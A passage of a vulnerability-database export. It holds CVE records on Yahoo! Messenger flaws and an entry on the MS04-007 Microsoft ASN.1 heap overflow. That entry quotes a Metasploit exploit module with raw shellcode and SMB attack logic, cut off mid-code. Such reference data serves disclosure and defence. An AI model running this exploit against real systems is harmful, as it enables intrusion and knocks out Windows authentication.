"shortName": "mitre"
},
"references": [
{
"name": "20050308 Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
},
{
"name": "12750",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/12750"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-0737",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20050308 Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability",
"refsource": "FULLDISC",
"url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
},
{
"name": "12750",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/12750"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-0737",
"datePublished": "2005-03-13T05:00:00Z",
"dateReserved": "2005-03-12T00:00:00Z",
"dateUpdated": "2024-09-17T02:01:33.428Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-7216 (GCVE-0-2014-7216)
Vulnerability from cvelistv5
Published
2015-09-11 20:00
Modified
2024-08-06 12:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/ | x_refsource_MISC | |
| https://hackerone.com/reports/10767 | x_refsource_MISC | |
| http://www.securityfocus.com/archive/1/536390/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securitytracker.com/id/1033544 | vdb-entry, x_refsource_SECTRACK | |
| http://seclists.org/fulldisclosure/2015/Sep/24 | mailing-list, x_refsource_FULLDISC | |
| http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T12:40:19.202Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://hackerone.com/reports/10767"
},
{
"name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"name": "1033544",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1033544"
},
{
"name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-09-03T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://hackerone.com/reports/10767"
},
{
"name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"name": "1033544",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1033544"
},
{
"name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-7216",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/",
"refsource": "MISC",
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
{
"name": "https://hackerone.com/reports/10767",
"refsource": "MISC",
"url": "https://hackerone.com/reports/10767"
},
{
"name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"name": "1033544",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1033544"
},
{
"name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"name": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-7216",
"datePublished": "2015-09-11T20:00:00",
"dateReserved": "2014-09-28T00:00:00",
"dateUpdated": "2024-08-06T12:40:19.202Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2006-3298 (GCVE-0-2006-3298)
Vulnerability from cvelistv5
Published
2006-06-29 01:00
Modified
2024-08-07 18:23
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.security.nnov.ru/Gnews281.html | x_refsource_MISC | |
| http://www.securityfocus.com/bid/18622 | vdb-entry, x_refsource_BID | |
| http://secunia.com/advisories/20773 | third-party-advisory, x_refsource_SECUNIA | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/27319 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T18:23:21.162Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.security.nnov.ru/Gnews281.html"
},
{
"name": "18622",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/18622"
},
{
"name": "20773",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/20773"
},
{
"name": "yahoo-messenger-nonascii-dos(27319)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-06-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-19T15:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.security.nnov.ru/Gnews281.html"
},
{
"name": "18622",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/18622"
},
{
"name": "20773",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/20773"
},
{
"name": "yahoo-messenger-nonascii-dos(27319)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-3298",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.security.nnov.ru/Gnews281.html",
"refsource": "MISC",
"url": "http://www.security.nnov.ru/Gnews281.html"
},
{
"name": "18622",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/18622"
},
{
"name": "20773",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/20773"
},
{
"name": "yahoo-messenger-nonascii-dos(27319)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-3298",
"datePublished": "2006-06-29T01:00:00",
"dateReserved": "2006-06-28T00:00:00",
"dateUpdated": "2024-08-07T18:23:21.162Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2006-5563 (GCVE-0-2006-5563)
Vulnerability from cvelistv5
Published
2006-10-27 16:00
Modified
2024-08-07 19:55
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html | mailing-list, x_refsource_FULLDISC | |
| http://secunia.com/advisories/22510 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.securityfocus.com/bid/20625 | vdb-entry, x_refsource_BID | |
| http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html | mailing-list, x_refsource_FULLDISC | |
| http://www.vupen.com/english/advisories/2006/4193 | vdb-entry, x_refsource_VUPEN | |
| http://www.securityfocus.com/archive/1/449667/100/0/threaded | mailing-list, x_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T19:55:53.391Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20061026 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
},
{
"name": "22510",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/22510"
},
{
"name": "20625",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/20625"
},
{
"name": "20061024 Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
},
{
"name": "ADV-2006-4193",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/4193"
},
{
"name": "20061025 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-10-24T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite. NOTE: the provenance of this information is unknown; the details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-17T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20061026 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
},
{
"name": "22510",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/22510"
},
{
"name": "20625",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/20625"
},
{
"name": "20061024 Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
},
{
"name": "ADV-2006-4193",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2006/4193"
},
{
"name": "20061025 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-5563",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite. NOTE: the provenance of this information is unknown; the details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20061026 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
"refsource": "FULLDISC",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
},
{
"name": "22510",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/22510"
},
{
"name": "20625",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/20625"
},
{
"name": "20061024 Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
"refsource": "FULLDISC",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
},
{
"name": "ADV-2006-4193",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/4193"
},
{
"name": "20061025 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-5563",
"datePublished": "2006-10-27T16:00:00",
"dateReserved": "2006-10-27T00:00:00",
"dateUpdated": "2024-08-07T19:55:53.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2005-0243 (GCVE-0-2005-0243)
Vulnerability from cvelistv5
Published
2005-02-18 05:00
Modified
2024-08-07 21:05
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/13712 | third-party-advisory, x_refsource_SECUNIA | |
| http://secunia.com/secunia_research/2005-2/advisory/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T21:05:25.023Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "13712",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/13712"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://secunia.com/secunia_research/2005-2/advisory/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2005-02-18T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-06-15T16:38:02",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "13712",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/13712"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://secunia.com/secunia_research/2005-2/advisory/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-0243",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "13712",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/13712"
},
{
"name": "http://secunia.com/secunia_research/2005-2/advisory/",
"refsource": "MISC",
"url": "http://secunia.com/secunia_research/2005-2/advisory/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-0243",
"datePublished": "2005-02-18T05:00:00",
"dateReserved": "2005-02-08T00:00:00",
"dateUpdated": "2024-08-07T21:05:25.023Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
var-200403-0051
Vulnerability from variot
Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. This vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. Issues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ##
$Id$
This file is part of the Metasploit Framework and may be subject to
redistribution and commercial restrictions. Please see the Metasploit
Framework web site for more information on licensing and terms of use.
http://metasploit.com/framework/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
'Description' => %q{
This is an exploit for a previously undisclosed
vulnerability in the bit string decoding code in the
Microsoft ASN.1 library. Both vulnerabilities were fixed in the
MS04-007 patch.
You are only allowed one attempt with this vulnerability. If
the payload fails to execute, the LSASS system service will
crash and the target system will automatically reboot itself
in 60 seconds. If the payload succeeeds, the system will no
longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A
reboot is required to restore proper functioning of an
exploited system.
This exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encounted when using the
equivalent bind payloads. Your mileage may vary.
},
'Author' => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
'License' => GPL_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2003-0818'],
[ 'OSVDB', '3902' ],
[ 'BID', '9633'],
[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
[ 'MSB', 'MS04-007'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
{
'Platform' => 'win',
},
],
],
'DisclosureDate' => 'Feb 10 2004',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']),
], self.class)
end
# This exploit is too destructive to use during automated exploitation.
# Better Windows-based exploits exist at this time (Sep 2006)
def autofilter
false
end
# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
# as a Metasploit Framework module with his permission. This module is only
# licensed under GPLv2, keep this in mind if you embed the Framework into
# a non-GPL application. -hdm[at]metasploit.com
def exploit
# The first stage shellcode fixes the PEB pointer and cleans the heap
stage0 =
"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
"\x08\x00\xeb\xfe"
token = spnego_token(stage0, payload.encoded)
case datastore['PROTO']
when 'smb'
exploit_smb(token)
when 'http'
exploit_http(token)
else
print_status("Invalid application protocol specified, use smb or http")
end
end
def exploit_smb(token)
connect
client = Rex::Proto::SMB::Client.new(sock)
begin
client.session_request(smb_hostname()) if not datastore['SMBDirect']
client.negotiate
client.session_setup_ntlmv2_blob(token)
rescue => e
if (e.to_s =~ /error code 0x00050001/)
